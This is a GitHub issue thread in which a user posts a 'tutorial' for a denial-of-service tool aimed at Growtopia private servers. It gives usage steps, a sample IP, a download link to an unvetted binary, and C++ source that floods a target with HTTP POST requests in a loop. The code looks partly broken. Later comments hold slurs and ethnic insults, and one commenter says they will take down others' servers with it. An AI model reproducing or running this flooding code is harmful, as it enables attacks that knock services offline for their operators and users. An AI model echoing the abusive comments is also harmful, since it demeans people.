### ISSUE TITLE
DDos any private server [TUTORIAL]

### ISSUE THREAD

**Issue by PrivateServerdestroyer** [GrowtopiaNoobs/GrowtopiaServer#1272]
1. Run the file.
2. Put the IP of server (only IP), example: 51.77.108.219
3. Hit enter!!!

Virus total: https://www.virustotal.com/gui/file/557acb583448546e7b67f9b43a6c196b174428f9fcd00a9ad574af20ad19f18f/detection

Download: https://www15.zippyshare.com/v/TidpGEuO/file.html

Source:
#include "stdafx.h"
#include
#include "enet/enet.h"
#include
using namespace std;
WSADATA wsaData;
SOCKADDR_IN SockAddr;
string w;
void get_Website(string url) {
SOCKET Socket;
string get_http;
get_http = "POST /growtopia/server_data.php HTTP/1.1\r\nHost: " + url + "\r\nUser-agent: Mozilla/3.0Gold\r\nReferer: http://retard/?T?EAWTGAWEGWAGAW@#R%T%$@!$!$%#@!%^(%P$#^#$^#$T^QATJO$#J";
WSAStartup(MAKEWORD(2, 2), &wsaData);
Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(Socket, (SOCKADDR*)(&SockAddr), sizeof(SockAddr));
send(Socket, get_http.c_str(), strlen(get_http.c_str()), 0);
SockAddr.sin_port = htons(80); SockAddr.sin_family = AF_INET; SockAddr.sin_addr.s_addr = ((unsigned long)gethostbyname(url.c_str())->h_addr);
}
int _tmain(int argc, _TCHAR* argv[])
{
cout << "Website: ";
cin >> w;
for (int i = 0; i < 5000000000; i++) get_Website(w);
while (1);
return 0;
cin.ignore(); cin.get();
}

**Comment by PrivateServerdestroyer** [comment]
up

**Comment by Alexander9673** [comment]
@GrowtopiaNoobs this should be deleted. not related to issues.

**Comment by Tron-GT** [comment]
@PrivateServerdestroyer Retard

**Comment by Bexpg2** [comment]
Retard thanks for it i will down ur all sub server with this

**Comment by Bexpg2** [comment]
Vyte stop beg people lmao

**Comment by PrivateServerdestroyer** [comment]
> Vyte stop beg people lmao

apa maksudmu?

**Comment by Bexpg2** [comment]
> > Vyte stop beg people lmao
> 
> apa maksudmu?

Lel indog

**Comment by Bexpg2** [comment]
Apa kontol anjing goblok bangsat memek pepek  aku orspucocu

**Comment by MoanHawks** [comment]
imagine indonesia not exist

**Comment by SecretSC** [comment]
Retard, Asshol, CYBER,

**Comment by D3c0d33** [comment]
> > > Vyte stop beg people lmao
> > 
> > 
> > apa maksudmu?
> 
> Lel indog

you just can say at internet, if meet real you're gonna cry lmao

**Comment by GrowtopiaNoobs** [comment]
Please don't post any threads about DDoS/DoS, if it isn't tutorial/patch for mitigating them.

**Comment by Subisu1442** [comment]
> > > > Vyte stop beg people lmao
> > > 
> > > 
> > > apa maksudmu?
> > 
> > Lel indog
> 
> you just can say at internet, if meet real you're gonna cry lmao

Are you Sureking#1335 at discord?
